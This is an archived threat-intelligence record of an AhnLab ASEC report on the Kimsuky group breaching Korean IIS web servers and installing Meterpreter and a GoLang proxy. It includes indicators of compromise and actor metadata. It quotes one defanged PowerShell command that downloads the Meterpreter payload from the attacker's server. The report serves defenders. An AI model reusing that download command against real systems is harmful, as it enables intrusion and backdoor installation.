{
	"id": "a5ed9fd4-4eab-4664-be85-84a880e8a0c0",
	"created_at": "2026-04-06T00:12:54.246588Z",
	"updated_at": "2026-04-10T03:37:41.202108Z",
	"deleted_at": null,
	"sha1_hash": "a55bce1b78a4e0b12a68df701fb97b65189ad579",
	"title": "Kimsuky Group Using Meterpreter to Attack Web Servers - ASEC",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2159023,
	"plain_text": "Kimsuky Group Using Meterpreter to Attack Web Servers - ASEC\r\nBy ATCP\r\nPublished: 2023-05-14 · Archived: 2026-04-05 19:15:42 UTC\r\nAhnLab Security Emergency response Center (ASEC) has recently discovered the distribution of malware targeting web servers by the Kimsuky group. Kimsuky is a threat group believed to be supported by North Korea and has been active since 2013. At first, they attacked North Korea-related research institutes in South Korea before attacking a Korean energy corporation in 2014. Since 2017, their attacks have also targeted countries other than South Korea. [1] ASEC has been publishing analyses of various Kimsuky attack cases on the ASEC Blog, mainly spear phishing attacks that deliver malicious email attachments in MS Office document [2], OneNote [3], or CHM [4] file formats. The Kimsuky group usually relies on social engineering attacks such as the aforementioned spear phishing, but this post covers attack cases that targeted web servers. After a successful breach, Kimsuky installed the Metasploit Meterpreter backdoor malware. Logs of a proxy malware developed in GoLang being installed have also been identified.\r\n1. Attack Cases Targeting IIS Web Servers\r\nThe attack target was a Windows IIS web server of a Korean construction company, which is thought to have had an unpatched vulnerability or to have been inadequately managed. The threat actor breached the IIS web server and executed a PowerShell command. The following is a log from AhnLab Smart Defense (ASD) which shows w3wp.exe, the Windows IIS web server worker process, using PowerShell to download an additional payload from an external host.\r\nhttps://asec.ahnlab.com/en/53046/\r\nPage 1 of 6\r\nFigure 1. Log of IIS web server process executing a PowerShell command\r\nThe executed PowerShell command is as follows, and the downloaded “img.dat” file is the backdoor malware also known as Metasploit Meterpreter.\r\n\u003e powershell.exe invoke-webrequest -uri “hxxp://45.58.52[.]82/up.dat” -outfile “c:\\programdata\\img.dat”\r\nAfterward, the threat actor used Meterpreter to install proxy malware as well. A PowerShell command was used here too.\r\nFigure 2. Proxy malware installed by Meterpreter\r\n2. Meterpreter Malware\r\nMetasploit is a penetration testing framework: a set of tools that can be used to inspect the networks and systems of companies and organizations for security vulnerabilities, providing various features for each stage of a penetration test. Meterpreter is a backdoor provided by Metasploit and can perform various malicious behaviors by receiving commands from the threat actor. Because Metasploit is an open-source tool, it is favored by various threat actors, and the Kimsuky group is no exception. The ASEC Blog has also covered cases of the Kimsuky group using Meterpreter alongside AppleSeed in their attacks. [5] [6] In addition, aside from the fact that the C\u0026C address used in the attack had been used by the Kimsuky group in the past, the method of having the regsvr32.exe process run the malware is the same as the method the Kimsuky group has used before. The malware used in the attacks is in DLL file format and runs after being loaded by the regsvr32.exe process.\r\nFigure 3. Meterpreter running after being loaded by the regsvr32.exe process\r\nWhat is different from usual is that the Meterpreter stager is developed in GoLang. In the past, the Kimsuky group developed their own malware, or packed it with a packer such as VMProtect when distributing it. The proxy malware is also developed in GoLang and is discussed below. We can assume that the recently distributed malware is being developed in GoLang to evade detection.\r\nFigure 4. Meterpreter Stager developed in GoLang\r\nFigure 5. Stager downloading Meterpreter\r\n3. Proxy (GoLang) Malware\r\nAfterwards, Meterpreter receives a command from the threat actor, executing a PowerShell command and installing additional malware. The malware downloaded through the PowerShell command has a proxy feature. The Kimsuky group has continuously used proxy malware in their attack processes in the past. [7] A trait unique to this sample is that it is developed in GoLang, unlike past versions.\r\nFigure 6. GoLang functions of the proxy malware\r\nThe proxy malware used in this attack receives two IP addresses and port numbers from the command line arguments and relays traffic between them. A difference from past proxy tools is that the string “aPpLe” is used as a signature, presumably for a verification process during communications. Considering that the RDP port “127.0.0.1:3389” is used as an example when the malware is executed, it is assumed that the threat actor's purpose in using a proxy malware is an RDP connection to the infected system in later stages.\r\nFigure 7. Proxy malware packet\r\n4. Conclusion\r\nThe Kimsuky group's attack targeting a Windows IIS web server has recently been found. Looking at the log, it is presumed that the Kimsuky group attacks web servers that are poorly managed or have unpatched vulnerabilities. After a successful breach, Meterpreter was installed on the target systems for the threat actor to gain control over the web server. Thus, server administrators must keep the server patched and up to date to prevent known vulnerabilities from being exploited. Moreover, for externally exposed servers, protection software must be used to restrict external access. Also, V3 should be updated to the latest version so that malware infection can be prevented.\r\nFile Detection\r\n– Backdoor/Win.Meterpreter.C5427507 (2023.05.15.02)\r\n– HackTool/Win.Proxy.C5427508 (2023.05.15.02)\r\nMD5\r\n000130a373ea4085b87b97a0c7000c86\r\n6b2062e61bcb46ce5ff19b329ce31b03\r\nURL\r\nhttp[:]//45[.]58[.]52[.]82/cl[.]exe\r\nhttp[:]//45[.]58[.]52[.]82/up[.]dat\r\nhttp[:]//45[.]58[.]52[.]82[:]8443/\r\nAdditional IOCs are available on AhnLab TIP.\r\nSource: https://asec.ahnlab.com/en/53046/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://asec.ahnlab.com/en/53046/"
	],
	"report_names": [
		"53046"
	],
	"threat_actors": [
		{
			"id": "191d7f9a-8c3c-442a-9f13-debe259d4cc2",
			"created_at": "2022-10-25T15:50:23.280374Z",
			"updated_at": "2026-04-10T02:00:05.305572Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"Kimsuky",
				"Black Banshee",
				"Velvet Chollima",
				"Emerald Sleet",
				"THALLIUM",
				"APT43",
				"TA427",
				"Springtail"
			],
			"source_name": "MITRE:Kimsuky",
			"tools": [
				"Troll Stealer",
				"schtasks",
				"Amadey",
				"GoBear",
				"Brave Prince",
				"CSPY Downloader",
				"gh0st RAT",
				"AppleSeed",
				"Gomir",
				"NOKKI",
				"QuasarRAT",
				"Gold Dragon",
				"PsExec",
				"KGH_SPY",
				"Mimikatz",
				"BabyShark",
				"TRANSLATEXT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "760f2827-1718-4eed-8234-4027c1346145",
			"created_at": "2023-01-06T13:46:38.670947Z",
			"updated_at": "2026-04-10T02:00:03.062424Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"G0086",
				"Emerald Sleet",
				"THALLIUM",
				"Springtail",
				"Sparkling Pisces",
				"Thallium",
				"Operation Stolen Pencil",
				"APT43",
				"Velvet Chollima",
				"Black Banshee"
			],
			"source_name": "MISPGALAXY:Kimsuky",
			"tools": [
				"xrat",
				"QUASARRAT",
				"RDP Wrapper",
				"TightVNC",
				"BabyShark",
				"RevClient"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d",
			"created_at": "2025-08-07T02:03:25.101147Z",
			"updated_at": "2026-04-10T02:00:03.846812Z",
			"deleted_at": null,
			"main_name": "NICKEL KIMBALL",
			"aliases": [
				"APT43 ",
				"ARCHIPELAGO ",
				"Black Banshee ",
				"Crooked Pisces ",
				"Emerald Sleet ",
				"ITG16 ",
				"Kimsuky ",
				"Larva-24005 ",
				"Opal Sleet ",
				"Ruby Sleet ",
				"SharpTongue ",
				"Sparking Pisces ",
				"Springtail ",
				"TA406 ",
				"TA427 ",
				"THALLIUM ",
				"UAT-5394 ",
				"Velvet Chollima "
			],
			"source_name": "Secureworks:NICKEL KIMBALL",
			"tools": [
				"BabyShark",
				"FastFire",
				"FastSpy",
				"FireViewer",
				"Konni"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "71a1e16c-3ba6-4193-be62-be53527817bc",
			"created_at": "2022-10-25T16:07:23.753455Z",
			"updated_at": "2026-04-10T02:00:04.73769Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"APT 43",
				"Black Banshee",
				"Emerald Sleet",
				"G0086",
				"G0094",
				"ITG16",
				"KTA082",
				"Kimsuky",
				"Larva-24005",
				"Larva-25004",
				"Operation Baby Coin",
				"Operation Covert Stalker",
				"Operation DEEP#DRIVE",
				"Operation DEEP#GOSU",
				"Operation Kabar Cobra",
				"Operation Mystery Baby",
				"Operation Red Salt",
				"Operation Smoke Screen",
				"Operation Stealth Power",
				"Operation Stolen Pencil",
				"SharpTongue",
				"Sparkling Pisces",
				"Springtail",
				"TA406",
				"TA427",
				"Thallium",
				"UAT-5394",
				"Velvet Chollima"
			],
			"source_name": "ETDA:Kimsuky",
			"tools": [
				"AngryRebel",
				"AppleSeed",
				"BITTERSWEET",
				"BabyShark",
				"BoBoStealer",
				"CSPY Downloader",
				"Farfli",
				"FlowerPower",
				"Gh0st RAT",
				"Ghost RAT",
				"Gold Dragon",
				"GoldDragon",
				"GoldStamp",
				"JamBog",
				"KGH Spyware Suite",
				"KGH_SPY",
				"KPortScan",
				"KimJongRAT",
				"Kimsuky",
				"LATEOP",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Lovexxx",
				"MailPassView",
				"Mechanical",
				"Mimikatz",
				"MoonPeak",
				"Moudour",
				"MyDogs",
				"Mydoor",
				"Network Password Recovery",
				"PCRat",
				"ProcDump",
				"PsExec",
				"ReconShark",
				"Remote Desktop PassView",
				"SHARPEXT",
				"SWEETDROP",
				"SmallTiger",
				"SniffPass",
				"TODDLERSHARK",
				"TRANSLATEXT",
				"Troll Stealer",
				"TrollAgent",
				"VENOMBITE",
				"WebBrowserPassView",
				"xRAT"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434374,
	"ts_updated_at": 1775792261,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a55bce1b78a4e0b12a68df701fb97b65189ad579.pdf",
		"text": "https://archive.orkl.eu/a55bce1b78a4e0b12a68df701fb97b65189ad579.txt",
		"img": "https://archive.orkl.eu/a55bce1b78a4e0b12a68df701fb97b65189ad579.jpg"
	}
}